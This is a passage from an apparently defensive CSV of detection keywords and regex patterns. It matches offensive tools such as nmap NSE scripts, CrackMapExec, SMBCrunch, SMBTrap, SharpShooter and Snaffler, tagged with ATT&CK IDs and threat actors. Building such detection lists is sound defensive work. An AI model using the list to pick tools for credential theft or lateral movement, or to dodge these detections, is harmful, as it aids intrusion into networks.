Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3220" "* smbexec.py*",".{0,1000}\ssmbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3221" "* smb-flood.nse*",".{0,1000}\ssmb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3222" "* SMBGrab.pl*",".{0,1000}\sSMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","3223" "* SMBHunt.pl*",".{0,1000}\sSMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","3224" "* SMBList.pl*",".{0,1000}\sSMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral 
Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","3225" "* -SmbLoginSpray *",".{0,1000}\s\-SmbLoginSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3226" "* smb-ls.nse*",".{0,1000}\ssmb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3227" "* smb-mbenum.nse*",".{0,1000}\ssmb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3228" "* smb-os-discovery.nse*",".{0,1000}\ssmb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3229" "* smb-print-text.nse*",".{0,1000}\ssmb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3230" "* smb-protocols.nse*",".{0,1000}\ssmb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3231" "* smb-psexec.nse*",".{0,1000}\ssmb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3232" "* smbrelayserver.py*",".{0,1000}\ssmbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","3233" "* smbscan.py *",".{0,1000}\ssmbscan\.py\s.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","3234" "* smb-security-mode.nse*",".{0,1000}\ssmb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3235" "* smb-server-stats.nse*",".{0,1000}\ssmb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3236" "* smbsr.db*",".{0,1000}\ssmbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3237" "* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3238" "* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3239" "* smbsr.py*",".{0,1000}\ssmbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3240" "* smbsr_results.csv*",".{0,1000}\ssmbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3241" "* smb-system-info.nse*",".{0,1000}\ssmb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3242" "* smbtrap2.py*",".{0,1000}\ssmbtrap2\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","3243" "* smbtrap-mitmproxy-inline.py*",".{0,1000}\ssmbtrap\-mitmproxy\-inline\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing 
man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","3244" "* smb-vuln-conficker.nse*",".{0,1000}\ssmb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3245" "* smb-vuln-cve2009-3103.nse*",".{0,1000}\ssmb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3246" "* smb-vuln-cve-2017-7494.nse*",".{0,1000}\ssmb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3247" "* smb-vuln-ms06-025.nse*",".{0,1000}\ssmb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3248" "* smb-vuln-ms07-029.nse*",".{0,1000}\ssmb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3249" "* smb-vuln-ms08-067.nse*",".{0,1000}\ssmb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3250" "* smb-vuln-ms10-054.nse*",".{0,1000}\ssmb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3251" "* smb-vuln-ms10-061.nse*",".{0,1000}\ssmb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3252" "* smb-vuln-ms17-010.nse*",".{0,1000}\ssmb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3253" "* smb-vuln-regsvc-dos.nse*",".{0,1000}\ssmb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3254" "* smb-vuln-webexec.nse*",".{0,1000}\ssmb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3255" "* smb-webexec-exploit.nse*",".{0,1000}\ssmb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3256" "* smtp-brute.nse*",".{0,1000}\ssmtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3257" "* smtp-commands.nse*",".{0,1000}\ssmtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3258" "* smtp-enum-users.nse*",".{0,1000}\ssmtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3259" "* smtp-log4shell.nse*",".{0,1000}\ssmtp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","3260" "* smtp-ntlm-info.nse*",".{0,1000}\ssmtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3261" "* smtp-open-relay.nse*",".{0,1000}\ssmtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3262" "* smtp-strangeport.nse*",".{0,1000}\ssmtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3263" "* smtp-vuln-cve2010-4344.nse*",".{0,1000}\ssmtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3264" "* smtp-vuln-cve2011-1720.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3265" "* smtp-vuln-cve2011-1764.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3266" "* smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\ssmtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","3267" "* --smuggle --template mcafee --com *",".{0,1000}\s\-\-smuggle\s\-\-template\smcafee\s\-\-com\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","3268" "* smuggler.py*",".{0,1000}\ssmuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","N/A","9","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","3269" "* snaffler.log*",".{0,1000}\ssnaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - 
